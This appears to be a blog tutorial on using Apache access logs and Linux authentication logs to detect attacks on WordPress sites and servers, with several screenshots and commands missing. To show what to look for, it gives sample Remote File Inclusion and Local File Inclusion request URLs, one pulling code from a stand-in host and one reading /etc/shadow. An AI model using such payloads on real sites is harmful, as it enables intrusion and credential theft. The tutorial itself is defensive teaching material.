Linux and our web applications store the details of processed actions in log files and we use these to track anything from server performance to visitors and vulnerabilities.
For our purpose, we are interested primarily in the access log which, recording each and every web request from client to server and whether successful or failed, helps us to trace malicious activity, isolating site or server weaknesses which we can then secure.
Checking the access log varies between web hosts. For shared types, most commonly using cPanel, there's a panel area called Logs, so there's a start. To scrutinize recent activity, click on Latest Visitors, then click through to your site. Historical records, on the other hand, often need enabling so, again with cPanel, this time click on the dashboard's Raw Access Logs icon, checking the boxes as shown here, clicking on Save:
Unmanaged types, meanwhile, will have an access log somewhere or other, by default in the /var/log/apache2 folder or often in a folder parallel to the relevant site's web root directory. You can view log activity in real time by using the tail command's -f parameter:
Reading the Common Log Format (CLF)
Access logs are typically set out in what's called CLF. Here's an example entry:
Records can be divvied up into four sections: what visitor wants what file, is from where, and using what client (or user agent).
A user-agent is the web connecting client such as a browser. When a client connects to a site, it discloses a user-agent string detailing the client, its version and the underlying operating system. This information helps a server decide how best to return data, for example according to browser-specific stylesheet rules.
This is the IP address, apparently, from where the client makes a request:
The HTTP header has three relevant request methods: POST to inject content via, say, a form; HEAD to query a page without resolving content, for example to find any changes; GET to retrieve a file such as an image, a stylesheet, or a favicon.
If someone wants to GET a page, there will be as many individual log records, per request, as there are individual files that, accumulatively, make up the page. The IP address, being a common denominator, can help organize requests into groups.
The file path, relative to the web root, is now noted along with the request protocol: this is generally HTTP/1.0 or 1.1 but could be, say, FTP. Then we have the status code, telling us how the web server answered the request such as by giving a 200 for OK or a 404 for File not found. Finally this section gives the file size in bytes, so that's 1405 here:
The web address value is where we may see attempted attacks. Your page may be called some-file.php, but that doesn't stop a hacker amending that using, for example, Remote or Local File Inclusion attacks which attempt to make your PHP execute either a remote exploit or to run a local command such as, respectively, these:
- RFI – http://somesite.com/some-file.php?page=http://badsite.com/bad.txt
- LFI – http://somesite.com/some-file.php? page=../../../etc/shadow%00
This RFI example wants PHP to run the dodgy code in bad.txt, perhaps to enable a backdoor server access. The LFI example wants a screen printout of your passwords.
This is the referrer, the place where the user has come from:
The user-agent string details the browser and operating system originating the request:
Exercising the logged data
Lots of information, and it gives us an idea how traffic analysis tools work, among other things. Before we get too excited, though, remember that the IP, referring site, and user agent can all be faked, so to go after a hacker's “IP address” can be a waste of time.
Then again, what we can deduce are some common values, particularly the IP and timeframe. For example, we can take the IP and run a search to see what else this visitor has been up to, both in this and other sessions. Those timestamps, meanwhile, help us to set down a sequential pattern of events.
Chicken and egg with logging plugins
Our analysis is empowered further when used in conjunction with other tools such as the WordPress Firewall 2 plugin which we installed in Setup an Anti-Malware Suite for WordPress, the LBAK User Tracking plugin which, guess what, tracks users, or the WordPress File Monitor which records file changes. In the case of the latter, for example, once e-mail-alerted to a file change, you can run a search of your logs for that file and the time of the change, noting the corresponding IP before searching for the IP to see what, if any, other mischief has been at play:
This can be a bit chicken and egg, this investigation, particularly as you learn about various log files and invidious attack scenarios, but given a little practise, this proves a superb way to employ knowledge to stifle future attacks by hardening your system.
Legwork for access logs
Here's a sharp tool from the experienced Steven Whitney to help flag those hacking attempts that your site has, hopefully, fended off. Just paste your log and don't freak out:
Finding decent online articles about logging is no mean feat which probably is a sign that not enough of us read them. Then again, Search Security has a superb piece called “How to spot attacks through Apache web server analysis”. You'll have to register, for free, but you should anyway, scouring this great site:
Logs and hosting types
Unmanaged hosting gives access to a wider array of logs, all of which work with not dissimilar logic to our access log. While managed and shared hosting users don't have the same responsibility for server security, unmanaged types can certainly benefit greatly from assessing these files.
For those with root access, the system log files, as opposed to site-specific log files, are generally found in the /var/log directory and can be listed like this:
Checking the authorization log
We won't detail every log but we'll check on who is accessing the server or running privileged tasks and, for this and depending on your Linux distribution, we peruse the auth.log or secure.log. Rather than opening the file with an editor, you can scroll it like this:
.. pressing Return to move down the page. Or just check the last 10 records like this:
Check for SSH logins by specifying its daemon, or process, using grep:
To query the /var/log/lastlog file to check the most recent server logins, per user:
Or you can specify, say, the last 10 logins for a specified user like this:
Query the faillog file for failed login attempts with this shortcut:
And check the wtmp log to see what users are logged into the server and doing what:
That's just a taste of the key security logs but there are other useful system logs such as messages, as well as application-specific logs. If you can't find a log file in the default folder then check its location in the relevant program's configuration file.
Securing and parsing logs
Having learned how to audit log files we've got an idea as to their value.
So do hackers.
You can bet your bottom dollar that if they can collar your server then they'll try to cover their tracks in the log files. Unmanaged types should exercise some best practice here, both to secure logs and to better protect the sites and server by properly managing them.
Use a tool such as OSSEC – which wpCop installs and configures in Setup OSSEC for Integrity, Logs & Alerts – to manage multiple logs and to do things such as send alerts or block IPs when malicious activity swings by. The firewall we look at in Simplify iptables with ConfigServer Firewall also helps and many swear by Fail2ban:
Consider piping encrypted logs to an external box using something such as Syslog-ng:
Good news. Logging may be dull as ditchwater but you can be sure that your WordPress sites and the underlying server are all the safer for your understanding of how they work, which are which and how to read them.